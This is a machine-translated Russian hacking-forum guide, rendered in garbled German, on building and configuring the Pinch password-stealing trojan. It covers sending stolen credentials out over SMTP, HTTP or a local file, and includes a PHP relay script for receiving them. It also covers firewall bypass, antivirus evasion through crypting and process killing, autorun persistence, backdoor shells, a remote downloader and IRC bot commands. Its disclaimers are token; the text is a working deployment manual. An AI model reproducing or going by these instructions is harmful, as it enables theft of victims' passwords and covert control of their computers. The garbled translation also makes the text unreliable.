This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen die Seife, benutzen BrutusAET2


DAS MATERIAL WIRD IN DER FAMILIARISIERUNG VERÖFFENTLICHT. DER AUTOR ÜBERNIMMT KEINE VERANTWORTUNG


-------------------------------------------------- ----------------
Teil 1. alt, aber nützlich. für die Prise 1

***********************
Pinch-Anweisung 1.0
***********************

=====
Einführung
=====

Bitte wundern Sie sich nicht, dass ich mich entschieden habe, einen solchen Artikel zu schreiben (Artikel für lamerzzz). Tatsache ist, dass in meinem Forum (http://forum.web-hack.ru) etwa einmal alle drei Tage ein Thema erstellt wird, wie "Wie man Pinch richtig konfiguriert und benutzt?", "Wie man Pinch benutzt?" usw.

===========
Eigenschaften
===========

Dieser Trojaner hat sich 2003/2004 ziemlich verbreitet. Alles dank der Fähigkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat!, Das Outlook Express Outlook, IE Autocomplete & geschützte Seiten & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp unterstützt)), kleines Gewicht, Open Source und einfache Erstellung eines Troy für eine bestimmte Aufgabe. Troyan hat folgende Möglichkeiten:

- Senden Sie die Konfiguration des Computers des Opfers: Betriebssystem, Betriebssystem, CPU, Festplatte, angemeldeter Benutzer, Hostname, IP
- Tastaturspion (Key-log)
- Remote-Konsole
- Firewall umgehen
- Senden aller Passwörter an E-Mail über einen SMTP-Server
- Verschlüsselung von gestohlenen Passwörtern per Post
- Trojaner automatische Entfernung nach dem Start
- HTML / Textberichte
- Die Dateigröße beträgt ca. 10 KB
- Modulares System
- Und vieles mehr...

Troyan schrieb coban2k (http://www.cobans.net) - eine ziemlich bekannte Person in der Welt des ICQ-Hacking. Aufgrund von Problemen mit dem Hosting des Trojaners auf seinem Server, war der Autor gezwungen, diese Kreation von seiner Website zu entfernen. Leider finden fast alle Antiviren dieses Triple und es kann nur für das Opfer vparit sein, das kein Antivirenprogramm hat.

============
Packungsinhalt
============

Die folgenden Ordner und Dateien sind im Archiv (pinch_1.0.zip) mit dem Trojaner enthalten:

\ PinchBuilder.exe - Wizard zum Erstellen von Trojanern
\ Parser.exe - Programm zum Entschlüsseln verschlüsselter E-Mails mit Passwörtern
\ readme.txt - keine Kommentare
\ Pinch \ - Hauptordner mit asm-Quellen des Trojaners und des Compilers
\ Sources \ - andere Quellen
\ TB! 2 Plugin (Auto-Parser) \ - Ordner mit einem Plug-In für The Bat 2 !, das verschlüsselte E-Mails mit Passwörtern dekodiert, die in Ihr Postfach gelangen
\ Sources \ Script \ - PHP-Skript, über das Passwörter gesendet werden, wenn die entsprechende Option beim Kompilieren ausgewählt wird (weiterlesen)

================
Kompiliere das Tripel
================

Das Kit wird mit einem speziellen Assistenten (PinchBuilder.exe) geliefert, der daran beteiligt ist, einen Trojaner für Ihre Anforderungen zu erstellen und den Trojaner direkt auf Ihrem Computer zu kompilieren. Das Programm hat zwei Hauptregisterkarten: Kompilieren und Entschlüsseln. Der erste wird verwendet, um einen Trojaner zu erstellen, und der zweite wird verwendet, um Passwörter zu entschlüsseln (in Wirklichkeit ist dieser Tab das Ergebnis der Operation der Datei Parser.exe). Dann gibt es drei Unterregisterkarten: SMTP, HTTP und FILE. Sie haben die Möglichkeit, Passwörter auszugeben. Lassen Sie uns jedes genauer analysieren:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Serverdomäne eingegeben haben, klicken Sie auf "Auflösen", damit die Serverdomäne wie eine IP-Adresse aussieht. Geben Sie als Nächstes in den Feldern Von und Bis eine eigene Soap an. Die Schaltfläche Test-Massage senden wird für den Versand von Test-E-Mails über die von Ihnen festgelegten Einstellungen verwendet. Ich empfehle dringend, dass Sie es verwenden. Wenn der Brief nicht kommt, bedeutet das, dass es einige Probleme mit dem Senden gibt (inklusive Firewall, schlechtes SMTP, nicht auf Resolve klicken, etc.).

Ich möchte anmerken, dass die meisten Anbieter in letzter Zeit zu einem System wechseln, bei dem ihre Kunden NUR Briefe von ihrem SMTP-Verver senden können. In solchen Fällen empfehle ich, die Methode des Sendens von Briefen über HTTP zu verwenden.

====
HTTP
====

Wir laden die Datei \ Sources \ Script \ view.php auf den Server hoch, der PHP-Skripte unterstützt und die mail () Funktion ausführt. Geben Sie als Nächstes im Feld URL den Pfad zu diesem Skript an (z. B. http://www.xss.ru/pinch.php). Geben Sie im Feld Betreff den Namen des Themas an, mit dem die Nachrichten wiederhergestellt werden. Im Feld Statusprüfung str sollte eine Zeile stehen, die nach dem Laden vom Skript ausgegeben wird. In dem Skript, das mit der Troy kommt, hat es einen Wert: _ret_ok_1:

<Skriptsprache = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, wird er versuchen, jede Minute eine Nachricht über dieses Skript zu senden, bis er eine Zeichenfolge aus dem Feld Statusprüfung str erhält. Ich empfehle dir, das Skript nicht aus der Standardlieferung zu verwenden, sondern von mir geschrieben:

<html> <Körper>
<? php
// Autor: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ Betreff = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) und isset ($ subject) und isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "Von: $ email");}
?>
<Skriptsprache = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Er macht fast dasselbe, ist aber kompetenter geschrieben. Ein großer Vorteil bei der Verwendung dieser Methode zum Senden von Kennwörtern ist die Tatsache, dass Sie Kennwörter senden können, die die Firewall umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Protokoll des Außenpostens, wenn das Passwort über das Skript von meiner Site gesendet wird:

Prozessname: iexplorer.exe
Protokoll: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder hat verstanden, wer nicht im Tank ist =) Neben den Pluspunkten kann ich die Möglichkeit hervorheben, verschlüsselte Briefe auf Ihrer Website zu schreiben und sie nicht an Soap zu senden. die Fähigkeit, die Soap zu ändern, an die die Passwörter gesendet werden, falls sie gelöscht wird; mit Massenmailing der Troy (damit Passwörter auch von solchen Providern versandt werden können, bei denen der Zugriff auf alle SMTP-Server außer diesen deaktiviert ist)

====
Datei
====

Diese Registerkarte legt den Pfad zu der Datei fest, in der alle Kennwörter gespeichert werden. Schreiben Sie dazu im Feld Pfad den Pfad zur Datei (z. B. C: \ password.txt).

================
Compiler-Optionen
================

In diesem Bereich ist alles klar, dann müssen Sie nur die Kästchen ankreuzen, wo Sie es brauchen. Es ist notwendig, auf das Feld Symbol hinzufügen zu achten. Es zeigt den Pfad zu dem Symbol an, aus dem der kompilierte Trojaner angezeigt wird. Ich möchte darauf hinweisen, dass ich auf meinem System (Windows XP) den Trojaner mit dieser Option nicht kompilieren konnte und dass er deaktiviert werden musste.

Geben Sie in den Protokollfeldern die Methode an, mit der die Kennwörter gesendet werden (SMTP / HTTP / FILE). Klicken Sie anschließend auf die Schaltfläche Kompilieren und gehen Sie zum Kompilieren des Trojaners, der mit dem Assistenten im Hauptordner gespeichert wird, um ihn zu erstellen.

======================
Entschlüsselung von Passwörtern
======================

Angenommen, Sie könnten dieses Triple lächerlich machen und Sie auf der Seife kamen Passwörter aus dem Auto des Opfers. Tatsache ist, dass beim Senden die Passwörter verschlüsselt sind und erst entschlüsselt werden müssen (wenn Sie kein spezielles Plug-In für TheBat! Haben, wie oben beschrieben). Kopieren Sie den Text mit den codierten Passwörtern in die Zwischenablage, öffnen Sie Parser.exe (oder die Registerkarte Decrypt in PinchBuilder.exe) und klicken Sie im Kontextmenü auf den Punkt Prozessdaten (oder drücken Sie einfach die Tastenkombination Alt + C). Als nächstes wird das Programm Ihnen alle Daten vom Opfer mit einem bequemen Formular gestohlen. Dann können Sie sie speichern oder drucken.

==========
Fazit
==========

Ich möchte Sie warnen, dass Sie bei der Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuches der Russischen Föderation fallen und streng bestraft werden können ;-) Ich (der Autor des Artikels) übernehme keine Verantwortung für den Schaden, der einigen Personen nach dem Lesen meines Artikels zugefügt werden kann.


----------------------------------------

Teil 2. Anweisung für Pinch 2.58

Ein kleiner Artikel über die elementare Konfiguration der Prise. Beurteile nicht streng, sondern kritisiere alles in deinem Mund. Artikel zum Einrichten von Pinch 2.58.

Ich denke, dass mit Crack-Ohm-Problemen gibt es keine Niukava, da gibt es eine detaillierte Hilfe und sogar ein Video ist beigefügt. Ich möchte Ihnen zeigen, wie Sie eine Drei im Builder einrichten:

SMTP-Eigenschaften
Server (Sie geben in Ihrem Fall smtp.mail.ru), dann drücken Sie unbedingt Resolve, so dass es in IP umgewandelt wird (übrigens muss der gesamte Betrug mit dem Internet verbunden sein)

Port - lass es so wie es ist

Protokoll - Die Wahl, wie der Bericht empfangen wird, per SMTP, HTTP (über PHP) und FILE - auf dem Computer gespeichert. Die gleichen Schaltflächen (SMTP, HTTP, FILE) konfigurieren die Protokolle, aber in diesem Fall sind wir an SMTP interessiert und wir haben es bereits konfiguriert.

TestSend- Taste sendet eine Testnachricht an die Mail.

Die Registerkarte " PWD" - gibt Passwörter aus den aufgelisteten Programmen aus. Das ENABLE PWD-Element enthält keine Kennwörter, wenn der Daw entfernt wird.
Schicke keinen alten Bericht - sende keine alten Berichte.
Gryki Encrypt und Packing sind miteinander verbunden. FSG, UPX, MEW Auswahl der Verpackungsmethode.

RUN - Wählen Sie die Methoden von Autorun. Ich denke, du wirst es klären. Zum Starten als .... standart, DLL, Undelate Service. Wechseln Sie in den Ordner ..... oder geben Sie einen der Systemordner an oder wählen Sie ihn aus. Auf der rechten Seite, die Spalte Werte habe ich nicht berührt und um ehrlich zu sein, stelle ich mir vage vor warum. Von unten rechts - umgehen Windows Firewall (SP2) - umgehen Sie die System-Firewall in SP2 (soweit ich den Mechanismus dieses Artikels kennen, es beginnt als iexplorer.exe)

Die Registerkarte SPY - einige zusätzliche Berichte - es hat nicht für mich funktioniert. Der Punkt des Bildschirmspions ist ein Screenshot, aber wieder hat es nicht funktioniert (srkin wurde gesendet, aber es war leer)

Der NET- Tab - ich habe ihn nicht benutzt. Es ist entworfen um:
1. Öffnen Sie einen beliebigen Port auf dem infizierten Computer und erhalten Sie entsprechend Zugriff (ignorieren Sie diese Verwendung, wenn Sie sie nicht verschlüsseln, wenn Sie erwischt werden, raten Sie selbst, was passieren wird ...)
2. Downloader - Geben Sie einen direkten Link zu einer Datei an, die heruntergeladen und ausgeführt werden soll (schätzen Sie, welche Kosten Ihr Gegner verursachen wird, wenn er Traffic hat ...))))
3. AutoUpdate - Auto Update - drei, nach der Arbeit, es heruntergeladen seine Kopie, und dann ist es selbst zerstört und das nächste System laden, eine neue Kopie wird gestartet (dies ist für die Zuverlässigkeit, so dass es nicht gefunden werden kann.

BD (Backdoor) -Registerkarte - Die Konsole öffnet die Shell auf dem ausgewählten Port, Telnet-Steuerelement (telnet.exe) oder alternativen Programmen. (Ich selbst habe es nicht versucht)

Der ECT- Tab - klebt zusammen mit jeder Datei, sowie das Setzen des Symbols ... Sie können das auch tun, die Nachricht erscheint ... Aber etwas funktioniert nicht ...

Die KILL- Registerkarte ist das Töten von jedem Prozess (Sie können versuchen, das Antivirus zu töten), zum Beispiel "spidernt" - und dann wird der DrWEB-Monitor ausgeschaltet (ich warne Sie, ich habe es noch nicht gegeben, aber ich werde es versuchen)

IE- Tab - stelle deine Homepage auf den Browser ein. Hinzufügen einer Seite zu Favoriten ....

Die Registerkarte WORM - Sho Zet Taeke, ich nicht ... .....

IRC-Bot Registerkarte - Zugriff auf den Computer über IRC:
.login-Berechtigung
.die - den Bot herunterfahren
.download - Datei von URL springen
.httpd - öffnet den Zugriff auf die Datei über http an einem bestimmten Port
.killthread - Abschluss einer bestimmten Aufgabe
.proxy - öffnet die sox4 s am ausgewählten Port mit der ausgewählten ID
.raw - Senden von Rohtext an diesen IRC-Server
.remove - Selbstlöschung
.restart - Neustart
.run - Führe Befehle aus
.scan - Scannen von IP-Adressen an bestimmten offenen Ports
.shell - Öffnen der Shell an einem bestimmten Port (nicht in 95/98 / ME)
.status - Version anzeigen, IP, Startdatum
.threads - zeigen aktive Aufgaben an
.update - selbst aktualisierender Bot von einer speziellen URL
.visit - besucht die ausgewählte URL versteckt
.url - besuchen Sie die ausgewählte URL offen
.link - Hinzufügen zu Favoriten
.sp - Mach deine Homepage
.msg - Nachrichtenbox

Das scheint alles zu sein .... Sie drücken COMPILE und Sie haben einen Ordner im Ordner mit dem Builder ...

GUTES GLÜCK !!!!!

PS: Alles wird zur Überprüfung geschrieben und der Autor übernimmt keine Verantwortung für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt-Funktionen:
Benutzte einen polymorphen Kryptor
Umgehen von KIS und Outpost (einschließlich der neuesten Versionen)
Selbstentnahme
Reduzierung der Größe (Normales Pinch verringert sich um 3-6kb, zupacha loader um 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~